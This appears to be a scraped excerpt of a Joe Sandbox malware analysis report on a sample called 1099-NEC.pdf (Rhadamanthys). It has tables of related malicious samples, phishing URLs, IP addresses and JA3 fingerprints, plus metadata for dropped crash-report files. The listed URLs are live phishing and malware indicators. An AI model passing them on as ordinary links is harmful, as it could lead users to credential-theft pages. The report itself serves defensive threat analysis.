	SecuriteInfo.com.Win32.RATX-gen.23694.15705.exe	Get hash	malicious	XWorm	Browse	185.166.143.49
	SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Get hash	malicious	SugarDump, XWorm	Browse	185.166.143.50
	SecuriteInfo.com.Win32.RATX-gen.3254.10881.exe	Get hash	malicious	LummaC Stealer	Browse	185.166.143.50
	SecuriteInfo.com.Win64.Evo-gen.10253.22166.exe	Get hash	malicious	Unknown	Browse	185.166.143.50
bg.microsoft.map.fastly.net	v4mNsTzbsL.exe	Get hash	malicious	XWorm	Browse	199.232.214.172
	SKMBT20783_ZM.vbs	Get hash	malicious	Unknown	Browse	199.232.214.172
	#U00d6DEME DETAYLARI 170325.exe	Get hash	malicious	FormBook	Browse	199.232.214.172
	PO#4500550389.xla.xlsx	Get hash	malicious	Unknown	Browse	199.232.210.172
	PO#4500550389.xla.xlsx	Get hash	malicious	Unknown	Browse	199.232.214.172
	New order 242.xls	Get hash	malicious	Unknown	Browse	199.232.210.172
	5rh5u9yBNf.exe	Get hash	malicious	GuLoader, HTMLPhisher	Browse	199.232.214.172
	SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exe	Get hash	malicious	LummaC Stealer	Browse	199.232.214.172
	Spy-Net.exe	Get hash	malicious	Sality	Browse	199.232.210.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SIMPLECARRER2IT	https://securefilepro.netlify.app/#Amanda_Taylor_Tax_Document_2024.pdf	Get hash	malicious	RHADAMANTHYS	Browse	185.208.159.170
	1776871603.exe	Get hash	malicious	Clipboard Hijacker	Browse	185.208.159.226
	SecuriteInfo.com.W32.PossibleThreat.23653.11848.exe	Get hash	malicious	Sliver	Browse	185.196.8.88
	V1CCX70AZ8P70ADNI.exe	Get hash	malicious	Clipboard Hijacker	Browse	185.208.159.226
	logrotate	Get hash	malicious	Xmrig	Browse	185.196.8.41
	http://analysiscache.com	Get hash	malicious	Unknown	Browse	185.208.158.121
	cred.dll	Get hash	malicious	Amadey	Browse	185.196.8.37
	clip64.dll	Get hash	malicious	Amadey	Browse	185.196.8.37
	cred64.dll.dll	Get hash	malicious	Amadey	Browse	185.196.8.37
	cpainject.txt.ps1	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	185.208.159.170
CLOUDFLARENETUS	http://email.shop2.wonderpark.my/c/eJwUyk1uhSAQAODTwJIM8wPzFiy68R4KYzX1iRHTprdvuv9aiRbTDN5KzIyIokp-K7YirKlWzVWAeRFKVVflF5OpSvJ7QUABijkKKVBgihmqGWBeYGnsGMbWLww__Wx2X_P9Fd6__ijb81zD0YfDyeFk80tZKK9iUJtASjaTNA2LnWO_eqj97XDyd7EWtv45n6OfjqHeNp5jP23rjx3jn_nvgn8BAAD__y9yPWo	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	172.67.214.184
	2450856955_.svg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	104.17.25.14
	REQUIRED-ORDER-REFERENCE-WITH-COMPANY-DETAILS.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	https://www.languagesim.com/interpretationterms/	Get hash	malicious	Unknown	Browse	104.16.117.116
	https://u17065553.ct.sendgrid.net/ls/click?upn=u001.Rw-2FXpvWBRDxNoiEvv-2B0VhGNZUddqwhjRz7Y3aH-2F1iEXujVcSjMM7CY7q30axNIjPtSPwVANtpwkARse71YbTG6hv5YyKcZ3EG9czO3tuqWXIHvFV-2FdtzTRYY9DFBEvbC0MnWDkjPffSjdhbZvMXBG-2Fbl-2F1JQalpy10ZBTpuDmJw8qtDG1RR-2FO-2Bzqy6Ryg-2BIXW6P-2FRmEE7JdIRaCncCouVLTVsWciZPEjkoHD7BDf7qzUctKE-2Fuov9RtCNiCQmJmwXCDa5dDgefQoLRKRDmR4vQ-3D-3DKnfO_4-2BCeSnTfNElQaOz0iIYXcY63TczAP34ghOtoTraLSwoOLAyQYuLOf75Ty99J50dacfCtsIK1GZvxQM45z1qBFZ9wseL0KuFhELugADtC7G-2Bvzzdi1qvZkAsCG7tQfhZagkro3woJV3MTqoQy1rs8sT0Ut5uYpsrniDcVKn6MJEnCWRsblRYyJRkv-2BYtQV-2BKUm1WYOzDqDkYxny3kQFWCbISNT8xpoE2o-2BIn1-2FK5Ue8M-3D	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	104.26.0.100
	3661627172.svg	Get hash	malicious	HTMLPhisher	Browse	172.67.129.81
	https://www.languagesim.com/interpretationterms/	Get hash	malicious	Unknown	Browse	104.16.117.116
	https://gamma.app/docs/LGBTQ-plus-Race-Ethnicity-Culture-and-Class-An-Intersectional-Con-w8f3vrxu51q7dll	Get hash	malicious	Unknown	Browse	104.18.11.200
	svchost.exe	Get hash	malicious	Unknown	Browse	104.20.3.235
TELKOMSEL-ASN-IDPTTelekomunikasiSelularID	resume.pdf	Get hash	malicious	Unknown	Browse	23.209.213.129
	f64da42c-e9a8-a0ac-437d-d14377da4643.eml	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	23.209.213.129
	hgfs.x86.elf	Get hash	malicious	Unknown	Browse	39.255.58.189
	arm7.elf	Get hash	malicious	Mirai	Browse	39.217.19.49
	hgfs.mips.elf	Get hash	malicious	Unknown	Browse	39.223.164.149
	hgfs.arm.elf	Get hash	malicious	Unknown	Browse	39.243.207.209
	attach.pdf	Get hash	malicious	Unknown	Browse	23.209.213.129
	sora.arm.elf	Get hash	malicious	Mirai	Browse	39.225.255.254
	hgfs.arm.elf	Get hash	malicious	Unknown	Browse	39.250.64.154
FASTLYUS	http://email.shop2.wonderpark.my/c/eJwUyk1uhSAQAODTwJIM8wPzFiy68R4KYzX1iRHTprdvuv9aiRbTDN5KzIyIokp-K7YirKlWzVWAeRFKVVflF5OpSvJ7QUABijkKKVBgihmqGWBeYGnsGMbWLww__Wx2X_P9Fd6__ijb81zD0YfDyeFk80tZKK9iUJtASjaTNA2LnWO_eqj97XDyd7EWtv45n6OfjqHeNp5jP23rjx3jn_nvgn8BAAD__y9yPWo	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.66.137
	2450856955_.svg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.130.137
	https://www.languagesim.com/interpretationterms/	Get hash	malicious	Unknown	Browse	151.101.2.137
	https://u17065553.ct.sendgrid.net/ls/click?upn=u001.Rw-2FXpvWBRDxNoiEvv-2B0VhGNZUddqwhjRz7Y3aH-2F1iEXujVcSjMM7CY7q30axNIjPtSPwVANtpwkARse71YbTG6hv5YyKcZ3EG9czO3tuqWXIHvFV-2FdtzTRYY9DFBEvbC0MnWDkjPffSjdhbZvMXBG-2Fbl-2F1JQalpy10ZBTpuDmJw8qtDG1RR-2FO-2Bzqy6Ryg-2BIXW6P-2FRmEE7JdIRaCncCouVLTVsWciZPEjkoHD7BDf7qzUctKE-2Fuov9RtCNiCQmJmwXCDa5dDgefQoLRKRDmR4vQ-3D-3DKnfO_4-2BCeSnTfNElQaOz0iIYXcY63TczAP34ghOtoTraLSwoOLAyQYuLOf75Ty99J50dacfCtsIK1GZvxQM45z1qBFZ9wseL0KuFhELugADtC7G-2Bvzzdi1qvZkAsCG7tQfhZagkro3woJV3MTqoQy1rs8sT0Ut5uYpsrniDcVKn6MJEnCWRsblRYyJRkv-2BYtQV-2BKUm1WYOzDqDkYxny3kQFWCbISNT8xpoE2o-2BIn1-2FK5Ue8M-3D	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	185.199.108.133
	https://www.languagesim.com/interpretationterms/	Get hash	malicious	Unknown	Browse	151.101.2.137
	https://click.selectiveasia.com/l391pk/vx4w8gZP	Get hash	malicious	Unknown	Browse	151.101.2.137
	VM(Carmen)52177372.mp4.html	Get hash	malicious	HTMLPhisher	Browse	151.101.130.137
	https://forms.office.com/e/CzYzGKsuJ0h0Qz9CdMLPYe0NavsKbyZ12uW0kP6	Get hash	malicious	HTMLPhisher	Browse	151.101.193.181
	Wpb00990__098.html	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.194.137

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	user.exe	Get hash	malicious	RHADAMANTHYS	Browse	185.166.143.48 142.250.185.225
	New requirement Orders.exe	Get hash	malicious	AgentTesla	Browse	185.166.143.48 142.250.185.225
	QUOTATION 03664710859027.exe	Get hash	malicious	Snake Keylogger	Browse	185.166.143.48 142.250.185.225
	SHANXI Outward Remittance.exe	Get hash	malicious	Snake Keylogger	Browse	185.166.143.48 142.250.185.225
	Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	185.166.143.48 142.250.185.225
	SKMBT20783_ZM.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	185.166.143.48 142.250.185.225
	K9PwdfoVnG.exe	Get hash	malicious	AgentTesla	Browse	185.166.143.48 142.250.185.225
	ALDAKHEEL OUD Order.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	185.166.143.48 142.250.185.225
	Pendiente De Transferencia.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	185.166.143.48 142.250.185.225
	73ybGtnYXx.exe	Get hash	malicious	WhiteSnake Stealer	Browse	185.166.143.48 142.250.185.225

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Msbuild.exe_9bb339a58ff9b4412d9b734fd588f7f44673659_00000000_018839ce-2b0e-451d-9207-5676daa9ada2\Report.wer

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8025870493101793
Encrypted:	false
SSDEEP:	96:5/SFcseaAuXRs9lAzxOMb5dQXIFdk+BHUHZopAnQHdE7HeSVcf+xnj+dF9yOyW0A:QKse3uXRH0ia5m9TM5zuiFpZ24IO8
MD5:	61E54282EC25AB93A9FBC128D53CF30B
SHA1:	A1C5F4E2F93BFEEC6CC77216F3D4BCFA7713DA04
SHA-256:	C9209F2B85A8CC6E22CD64BFE6A0FF56A334AFF3D3338C16AA20A9D180F10E77
SHA-512:	88BA95C535BC8F707996B59685C2F7C0E0C19466B5960A329944CCA3E644B312B744E64463574D733D14345D5F6B47EA5B10476701E48390B97311570922F7A0
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.6.7.0.7.6.0.6.7.0.3.1.8.0.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.6.7.0.7.6.0.7.5.7.0.1.6.4.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.1.8.8.3.9.c.e.-.2.b.0.e.-.4.5.1.d.-.9.2.0.7.-.5.6.7.6.d.a.a.9.a.d.a.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.S.B.u.i.l.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.3.8.-.0.0.0.1.-.0.0.1.9.-.a.c.d.7.-.d.b.7.b.6.5.9.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.4.3.5.3.8.8.1.e.7.f.4.e.9.c.7.6.1.0.f.4.e.0.4.8.9.1.8.3.b.5.5.b.b.5.8.b.b.5.7.4.!.M.S.B.u.i.l.d...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.9././.1.0././.2.5.:.0.4.:.1.8.:.5.7.!.1.d.d.5.0.!.M.S.B.u.i.l.d...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Msbuild.exe_9bb339a58ff9b4412d9b734fd588f7f44673659_00000000_85e6ddd5-e3ce-4017-bbdc-80a37d168c06\Report.wer

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 1099-NEC.pdf

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Rhadamanthys

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Msbuild.exe_9bb339a58ff9b4412d9b734fd588f7f44673659_00000000_018839ce-2b0e-451d-9207-5676daa9ada2\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Msbuild.exe_9bb339a58ff9b4412d9b734fd588f7f44673659_00000000_85e6ddd5-e3ce-4017-bbdc-80a37d168c06\Report.wer

Windows Analysis Report
1099-NEC.pdf